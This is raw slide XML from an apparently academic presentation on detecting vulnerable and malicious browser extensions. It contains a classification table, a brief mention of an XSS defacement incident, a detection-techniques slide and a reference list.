                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>v3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4925" marB="0">
                    <a:lnL w="3175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FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF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81915" marR="292100" indent="-635">
                        <a:lnSpc>
                          <a:spcPts val="1570"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="415"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1400" spc="-5" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Benign</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="14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or  Malicious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52705" marB="0">
                    <a:lnL w="3175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FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF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81915" marR="72390" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="93000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="390"/>
                        </a:spcBef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Visible interfaces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may or may not be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present,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user events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may or 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may not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initiate functionalities,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APIs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render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web requests to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white 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listed websites or to the browser extension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vendor’s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="14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website.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3175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FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="soli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15669">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="8191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spc="-5" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>v4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4925" marB="0">
                    <a:lnL w="3175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FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="soli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81915" marR="104139" indent="-635">
                        <a:lnSpc>
                          <a:spcPts val="1570"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="415"/>
                        </a:spcBef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Vulnerable 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or</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="14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Malicious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52705" marB="0">
                    <a:lnL w="3175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FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB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marL="81915" marR="72390" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="93100"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="390"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1400" spc="-10" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Visible interfaces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may or may not be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present,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user events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may or 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may not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initiate intended functionalities,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APIs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render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web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requests  without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input filtering to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websites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that are not white listed or </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1400" spc="-10" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>related to 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the browser extension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vendor’s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="14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website.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49530" marB="0">
                    <a:lnL w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="00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512824" y="769111"/>
            <a:ext cx="718756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5" dirty="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>incident: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>Information</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="125" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>modification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70102" y="4895342"/>
            <a:ext cx="7913370" cy="1397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06375" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Hackers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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took</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-65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</a:rPr>
              <a:t>advantage</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia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Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-95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on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>www.eu2010.es</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-75" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia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replace</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>image </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Spanish Prime </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Minister Jose Rodriguez </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>with the smiling </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>face </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Rowan  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Atkinson</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="430" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr sz="18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har char="•"/>
            </a:pPr>
            <a:endParaRPr sz="1850">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="148590" indent="-135890">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="149225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Source:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://countermeasures.trendmicro.eu/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100327" y="1447800"/>
            <a:ext cx="7782306" cy="304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890266" y="3124200"/>
            <a:ext cx="1676400" cy="15240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72516" y="6801822"/>
            <a:ext cx="1052195" cy="2019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z="1200" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ACM SAC</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2014</a:t>
            </a:r>
            <a:endParaRPr sz="12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094216" y="6805633"/>
            <a:ext cx="135890" cy="196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425"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:fld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014475" y="586232"/>
            <a:ext cx="8182609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211195" marR="5080" indent="-319913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Detection </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>techniques of </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>and malicious  </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>extensions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="2209800"/>
            <a:ext cx="6019800" cy="33528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548126" y="6114541"/>
            <a:ext cx="22434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onstantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>HMM‐based</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-114" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>approach</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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6830">
              <a:lnSpc>
                <a:spcPts val="1425"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr dirty="0"/>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr dirty="0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111244" y="578611"/>
            <a:ext cx="1837689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55" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-85" dirty="0"/>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-55" dirty="0"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>enc</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>es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6830">
              <a:lnSpc>
                <a:spcPts val="1425"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr dirty="0"/>
              <a:t>91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93902" y="1416050"/>
            <a:ext cx="7988300" cy="5219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marR="445770" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="286385" algn="l"/>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Hossain </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Shahriar, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Komminist Weldemariam, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Mohammad Zulkernine, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Thibaud </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Lutellier, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“Effective detection </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>browser extensions” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Computers </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Security, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Vol. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>47, pp.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-125" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>66‐84.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="18415" indent="-274320" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="285"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>M. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Dhawan </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>V. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Ganapathy, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“Analyzing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>information </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>flow </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>javascript‐based </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>browser </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>extensions,” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Proceedings of  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the 2009 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Annual </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Computer </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Applications </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Conference, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ser. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ACSAC </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>’09. IEEE </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Computer </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Society, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2009, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pp. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>382–  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>391.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="468630" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="290"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="286385" algn="l"/>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>V.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> Djeric</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-75" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>A.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Goel, “Securing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>script‐based</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>extensibility</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-45" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>browsers,”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
